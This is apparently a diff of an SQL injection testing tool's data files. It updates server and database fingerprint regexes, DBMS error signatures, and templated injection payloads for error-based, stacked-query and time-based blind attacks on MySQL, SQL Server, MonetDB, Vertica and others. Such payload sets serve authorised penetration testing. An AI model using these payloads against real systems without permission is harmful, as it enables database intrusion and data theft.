--- a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
+++ b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
--- a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
+++ b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
--- a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
+++ b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
--- a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
+++ b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
--- a/data/xml/banner/generic.xml
+++ b/data/xml/banner/generic.xml
@@ -83,6 +83,10 @@
        <info type="Linux"/>
    </regexp>
    <regexp value="\bArch\b">
        <info type="Linux" distrib="Arch"/>
    </regexp>
    <regexp value="CentOS">
        <info type="Linux" distrib="CentOS"/>
    </regexp>
@@ -115,10 +119,22 @@
        <info type="Linux" distrib="Mandrake"/>
    </regexp>
    <regexp value="Manjaro">
        <info type="Linux" distrib="Manjaro"/>
    </regexp>
    <regexp value="Mandriva">
        <info type="Linux" distrib="Mandriva"/>
    </regexp>
    <regexp value="\bMint\b">
        <info type="Linux" distrib="Mint"/>
    </regexp>
    <regexp value="\bPuppy\b">
        <info type="Linux" distrib="Puppy"/>
    </regexp>
    <regexp value="Red[\-\_\ ]?Hat">
        <info type="Linux" distrib="Red Hat"/>
    </regexp>
--- a/data/xml/banner/mssql.xml
+++ b/data/xml/banner/mssql.xml
--- a/data/xml/banner/mysql.xml
+++ b/data/xml/banner/mysql.xml
@@ -1,5 +1,10 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <!--
     References:
     * https://en.wikipedia.org/wiki/Debian_version_history
 -->
 <root>
    <regexp value="^([\d\.\-]+)[\-\_\ ].*">
        <info dbms_version="1"/>
@@ -36,19 +41,27 @@
    </regexp>
    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+wheezy">
-        <info dbms_version="1" type="Linux" distrib="Debian" release="7.0" codename="wheezy"/>
+        <info dbms_version="1" type="Linux" distrib="Debian" release="7" codename="wheezy"/>
    </regexp>
    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+jessie">
-        <info dbms_version="1" type="Linux" distrib="Debian" release="8.0" codename="jessie"/>
+        <info dbms_version="1" type="Linux" distrib="Debian" release="8" codename="jessie"/>
    </regexp>
    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+stretch">
-        <info dbms_version="1" type="Linux" distrib="Debian" release="9.0" codename="stretch"/>
+        <info dbms_version="1" type="Linux" distrib="Debian" release="9" codename="stretch"/>
    </regexp>
    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+buster">
-        <info dbms_version="1" type="Linux" distrib="Debian" release="10.0" codename="buster"/>
+        <info dbms_version="1" type="Linux" distrib="Debian" release="10" codename="buster"/>
    </regexp>
    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+bullseye">
        <info dbms_version="1" type="Linux" distrib="Debian" release="11" codename="bullseye"/>
    </regexp>
    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+bookworm">
        <info dbms_version="1" type="Linux" distrib="Debian" release="12" codename="bookworm"/>
    </regexp>
    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+(sid|unstable)">
--- a/data/xml/banner/oracle.xml
+++ b/data/xml/banner/oracle.xml
--- a/data/xml/banner/postgresql.xml
+++ b/data/xml/banner/postgresql.xml
--- a/data/xml/banner/server.xml
+++ b/data/xml/banner/server.xml
--- a/data/xml/banner/servlet-engine.xml
+++ b/data/xml/banner/servlet-engine.xml
@@ -7,6 +7,14 @@
        <info technology="Tomcat" tech_version="1"/>
    </regexp>
    <regexp value="Enhydra Application Server/([\d\.]+)">
        <info technology="Enhydra" tech_version="1"/>
    </regexp>
    <regexp value="Jetty/([\d\.]+)">
        <info technology="Jetty" tech_version="1"/>
    </regexp>
    <regexp value="JSP[\-\_\/\ ]([\d\.]+)">
        <info technology="JSP" tech_version="1"/>
    </regexp>
--- a/data/xml/banner/set-cookie.xml
+++ b/data/xml/banner/set-cookie.xml
@@ -27,7 +27,7 @@
        <info technology="WebSphere"/>
    </regexp>
-    <regexp value="PHPSESSION">
+    <regexp value="PHPSESS">
        <info technology="PHP"/>
    </regexp>
@@ -50,4 +50,16 @@
    <regexp value="CFID|CFTOKEN|CFMAGIC|CFGLOBALS">
        <info technology="ColdFusion"/>
    </regexp>
    <regexp value="WebLogicSession">
        <info technology="WebLogic"/>
    </regexp>
    <regexp value="MoodleSession">
        <info technology="Moodle"/>
    </regexp>
    <regexp value="\bwp_">
        <info technology="WordPress"/>
    </regexp>
 </root>
--- a/data/xml/banner/sharepoint.xml
+++ b/data/xml/banner/sharepoint.xml
--- a/data/xml/banner/x-aspnet-version.xml
+++ b/data/xml/banner/x-aspnet-version.xml
--- a/data/xml/banner/x-powered-by.xml
+++ b/data/xml/banner/x-powered-by.xml
@@ -35,8 +35,12 @@
        <info technology="ASP.NET" type="Windows"/>
    </regexp>
-    <regexp value="(JBoss|Tomcat)[\-\_\/\ ]?([\d\.]+)">
+    <regexp value="Tomcat[\-\_\/\ ]?([\d\.]+)">
-        <info technology="Tomcat" tech_version="2"/>
+        <info technology="Tomcat" tech_version="1"/>
    </regexp>
    <regexp value="JBoss[\-\_\/\ ]?([\d\.]+)">
        <info technology="JBoss" tech_version="1"/>
    </regexp>
    <regexp value="Servlet[\-\_\/\ ]?([\d\.]+)">
--- a/data/xml/boundaries.xml
+++ b/data/xml/boundaries.xml
--- a/data/xml/errors.xml
+++ b/data/xml/errors.xml
@@ -7,13 +7,18 @@
        <error regexp="Warning.*?\Wmysqli?_"/>
        <error regexp="MySQLSyntaxErrorException"/>
        <error regexp="valid MySQL result"/>
-        <error regexp="check the manual that corresponds to your (MySQL|MariaDB) server version"/>
+        <error regexp="check the manual that (corresponds to|fits) your MySQL server version"/>
        <error regexp="Unknown column '[^ ]+' in 'field list'"/>
        <error regexp="MySqlClient\."/>
        <error regexp="com\.mysql\.jdbc"/>
        <error regexp="Zend_Db_(Adapter|Statement)_Mysqli_Exception"/>
        <error regexp="Pdo[./_\\]Mysql"/>
        <error regexp="MySqlException"/>
        <error regexp="SQLSTATE\[\d+\]: Syntax error or access violation"/>
        <error regexp="check the manual that (corresponds to|fits) your MariaDB server version" fork="MariaDB"/>
        <error regexp="MemSQL does not support this type of query" fork="MemSQL"/>
        <error regexp="is not supported by MemSQL" fork="MemSQL"/>
        <error regexp="unsupported nested scalar subselect" fork="MemSQL"/>
    </dbms>
    <!-- PostgreSQL -->
@@ -168,4 +173,52 @@
    <dbms value="H2">
        <error regexp="org\.h2\.jdbc"/>
    </dbms>
    <!-- MonetDB -->
    <dbms value="MonetDB">
        <error regexp="![0-9]{5}![^\n]+(failed|unexpected|error|syntax|expected|violation|exception)"/>
        <error regexp="\[MonetDB\]\[ODBC Driver"/>
        <error regexp="nl\.cwi\.monetdb\.jdbc"/>
    </dbms>
    <!-- Apache Derby -->
    <dbms value="Apache Derby">
        <error regexp="Syntax error: Encountered"/>
        <error regexp="org\.apache\.derby"/>
        <error regexp="ERROR 42X01"/>
    </dbms>
    <!-- Vertica -->
    <dbms value="Vertica">
        <error regexp=", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):"/>
        <error regexp="/vertica/Parser/scan"/>
        <error regexp="com\.vertica\.jdbc"/>
        <error regexp="org\.jkiss\.dbeaver\.ext\.vertica"/>
        <error regexp="com\.vertica\.dsi\.dataengine"/>
    </dbms>
    <!-- Mckoi -->
    <dbms value="Mckoi">
        <error regexp="com\.mckoi\.JDBCDriver"/>
        <error regexp="com\.mckoi\.database\.jdbc"/>
    </dbms>
    <!-- Presto -->
    <dbms value="Presto">
        <error regexp="com\.facebook\.presto\.jdbc"/>
        <error regexp="io\.prestosql\.jdbc"/>
        <error regexp="com\.simba\.presto\.jdbc"/>
        <error regexp="UNION query has different number of fields: \d+, \d+"/>
    </dbms>
    <!-- Altibase -->
    <dbms value="Altibase">
        <error regexp="Altibase\.jdbc\.driver"/>
    </dbms>
    <!-- MimerSQL -->
    <dbms value="MimerSQL">
        <error regexp="com\.mimer\.jdbc"/>
        <error regexp="Syntax error,[^\n]+assumed to mean"/>
    </dbms>
 </root>
--- a/data/xml/payloads/boolean_blind.xml
+++ b/data/xml/payloads/boolean_blind.xml
--- a/data/xml/payloads/error_based.xml
+++ b/data/xml/payloads/error_based.xml
@@ -704,6 +704,82 @@
            <dbms>Firebird</dbms>
        </details>
    </test>
    <test>
        <title>MonetDB AND error-based - WHERE or HAVING clause</title>
        <stype>2</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
        <request>
            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>MonetDB</dbms>
        </details>
    </test>
    <test>
        <title>MonetDB OR error-based - WHERE or HAVING clause</title>
        <stype>2</stype>
        <level>3</level>
        <risk>3</risk>
        <clause>1,9</clause>
        <where>2</where>
        <vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
        <request>
            <payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>MonetDB</dbms>
        </details>
    </test>
    <test>
        <title>Vertica AND error-based - WHERE or HAVING clause</title>
        <stype>2</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,8,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
        <request>
            <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>Vertica</dbms>
        </details>
    </test>
    <test>
        <title>Vertica OR error-based - WHERE or HAVING clause</title>
        <stype>2</stype>
        <level>3</level>
        <risk>3</risk>
        <clause>1,8,9</clause>
        <where>2</where>
        <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
        <request>
            <payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>Vertica</dbms>
        </details>
    </test>
    <!--
         TODO: if possible, add payload for SQLite, Microsoft Access,
         and SAP MaxDB - no known techniques at this time
--- a/data/xml/payloads/inline_query.xml
+++ b/data/xml/payloads/inline_query.xml
@@ -74,7 +74,8 @@
        <where>3</where>
        <vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
        <request>
-            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
+            <!-- NOTE: Vertica works too without the TO_NUMBER() -->
            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
--- a/data/xml/payloads/stacked_queries.xml
+++ b/data/xml/payloads/stacked_queries.xml
@@ -3,7 +3,7 @@
 <root>
    <!-- Stacked queries tests -->
    <test>
-        <title>MySQL &gt; 5.0.11 stacked queries (comment)</title>
+        <title>MySQL &gt;= 5.0.12 stacked queries (comment)</title>
        <stype>4</stype>
        <level>2</level>
        <risk>1</risk>
@@ -19,12 +19,12 @@
        </response>
        <details>
            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>
    <test>
-        <title>MySQL &gt; 5.0.11 stacked queries</title>
+        <title>MySQL &gt;= 5.0.12 stacked queries</title>
        <stype>4</stype>
        <level>3</level>
        <risk>1</risk>
@@ -39,12 +39,12 @@
        </response>
        <details>
            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>
     <test>
-        <title>MySQL &gt; 5.0.11 stacked queries (query SLEEP - comment)</title>
+        <title>MySQL &gt;= 5.0.12 stacked queries (query SLEEP - comment)</title>
        <stype>4</stype>
        <level>3</level>
        <risk>1</risk>
@@ -60,12 +60,12 @@
        </response>
        <details>
            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>
    <test>
-        <title>MySQL &gt; 5.0.11 stacked queries (query SLEEP)</title>
+        <title>MySQL &gt;= 5.0.12 stacked queries (query SLEEP)</title>
        <stype>4</stype>
        <level>4</level>
        <risk>1</risk>
@@ -80,7 +80,7 @@
        </response>
        <details>
            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>
@@ -268,6 +268,28 @@
        </details>
    </test>
    <test>
        <title>Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)</title>
        <stype>4</stype>
        <level>2</level>
        <risk>1</risk>
        <clause>1-8</clause>
        <where>1</where>
        <vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
        <request>
            <payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
            <os>Windows</os>
        </details>
    </test>
    <test>
        <title>Microsoft SQL Server/Sybase stacked queries</title>
        <stype>4</stype>
@@ -289,6 +311,27 @@
        </details>
    </test>
    <test>
        <title>Microsoft SQL Server/Sybase stacked queries (DECLARE)</title>
        <stype>4</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>1-8</clause>
        <where>1</where>
        <vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
        <request>
            <payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
            <os>Windows</os>
        </details>
    </test>
    <test>
        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>
        <stype>4</stype>
--- a/data/xml/payloads/time_blind.xml
+++ b/data/xml/payloads/time_blind.xml
@@ -2,98 +2,18 @@
 <root>
    <!-- Time-based boolean tests -->
    <test>
        <title>MySQL &gt;= 5.0.12 AND time-based blind</title>
        <stype>5</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,8,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
        <request>
            <payload>AND SLEEP([SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.0.12 OR time-based blind</title>
        <stype>5</stype>
        <level>1</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
        <request>
            <payload>OR SLEEP([SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.0.12 AND time-based blind (comment)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
        <request>
            <payload>AND SLEEP([SLEEPTIME])</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.0.12 OR time-based blind (comment)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
        <request>
            <payload>OR SLEEP([SLEEPTIME])</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>
    <!-- Prefering "query SLEEP" over "SLEEP" because of JOIN-alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) -->
    <test>
        <title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</title>
        <stype>5</stype>
-        <level>2</level>
+        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,8,9</clause>
        <where>1</where>
-        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
        <request>
-            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
@@ -107,13 +27,95 @@
    <test>
        <title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title>
        <stype>5</stype>
        <level>1</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
        <request>
            <payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>1</risk>
        <clause>1,2,3,8,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
        <request>
            <payload>AND SLEEP([SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
-        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
        <request>
-            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>OR SLEEP([SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP - comment)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
        <request>
            <payload>AND SLEEP([SLEEPTIME])</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>
    <test>
        <title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP - comment)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
        <request>
            <payload>OR SLEEP([SLEEPTIME])</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
@@ -131,9 +133,9 @@
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
-        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
        <request>
-            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
            <comment>#</comment>
        </request>
        <response>
@@ -152,9 +154,9 @@
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
-        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
        <request>
-            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
            <comment>#</comment>
        </request>
        <response>
@@ -167,7 +169,7 @@
    </test>
    <test>
-        <title>MySQL &lt;= 5.0.11 AND time-based blind (heavy query)</title>
+        <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>2</risk>
@@ -182,12 +184,12 @@
        </response>
        <details>
            <dbms>MySQL</dbms>
-            <dbms_version>&lt;= 5.0.11</dbms_version>
+            <dbms_version>&lt; 5.0.12</dbms_version>
        </details>
    </test>
    <test>
-        <title>MySQL &lt;= 5.0.11 OR time-based blind (heavy query)</title>
+        <title>MySQL &lt; 5.0.12 OR time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>3</risk>
@@ -202,12 +204,12 @@
        </response>
        <details>
            <dbms>MySQL</dbms>
-            <dbms_version>&lt;= 5.0.11</dbms_version>
+            <dbms_version>&lt; 5.0.12</dbms_version>
        </details>
    </test>
    <test>
-        <title>MySQL &lt;= 5.0.11 AND time-based blind (heavy query - comment)</title>
+        <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>2</risk>
@@ -223,12 +225,12 @@
        </response>
        <details>
            <dbms>MySQL</dbms>
-            <dbms_version>&lt;= 5.0.11</dbms_version>
+            <dbms_version>&lt; 5.0.12</dbms_version>
        </details>
    </test>
    <test>
-        <title>MySQL &lt;= 5.0.11 OR time-based blind (heavy query - comment)</title>
+        <title>MySQL &lt; 5.0.12 OR time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
@@ -244,7 +246,7 @@
        </response>
        <details>
            <dbms>MySQL</dbms>
-            <dbms_version>&lt;= 5.0.11</dbms_version>
+            <dbms_version>&lt; 5.0.12</dbms_version>
        </details>
    </test>
@@ -296,9 +298,9 @@
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
-        <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
        <request>
-            <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
@@ -316,9 +318,9 @@
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
-        <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
        <request>
-            <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
            <comment>#</comment>
        </request>
        <response>
@@ -1490,9 +1492,9 @@
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>3</where>
-        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
        <request>
-            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
@@ -1504,7 +1506,7 @@
    </test>
    <test>
-        <title>MySQL &lt;= 5.0.11 time-based blind - Parameter replace (heavy queries)</title>
+        <title>MySQL &lt; 5.0.12 time-based blind - Parameter replace (heavy queries)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>2</risk>
@@ -1519,7 +1521,7 @@
        </response>
        <details>
            <dbms>MySQL</dbms>
-            <dbms_version>&lt;= 5.0.11</dbms_version>
+            <dbms_version>&lt; 5.0.12</dbms_version>
        </details>
    </test>
@@ -1859,7 +1861,7 @@
    </test>
    <test>
-        <title>MySQL &lt;= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
+        <title>MySQL &lt; 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>2</risk>
@@ -1874,7 +1876,7 @@
        </response>
        <details>
            <dbms>MySQL</dbms>
-            <dbms_version>&lt;= 5.0.11</dbms_version>
+            <dbms_version>&lt; 5.0.12</dbms_version>
        </details>
    </test>
--- a/data/xml/payloads/union_query.xml
+++ b/data/xml/payloads/union_query.xml
--- a/data/xml/queries.xml
+++ b/data/xml/queries.xml
@@ -3,7 +3,8 @@
 <root>
    <!-- MySQL -->
    <dbms value="MySQL">
-        <cast query="CAST(%s AS CHAR)"/>
+        <!-- http://dba.fyicenter.com/faq/mysql/Difference-between-CHAR-and-NCHAR.html -->
        <cast query="CAST(%s AS NCHAR)"/>
        <length query="CHAR_LENGTH(%s)"/>
        <isnull query="IFNULL(%s,' ')"/>
        <delimiter query=","/>
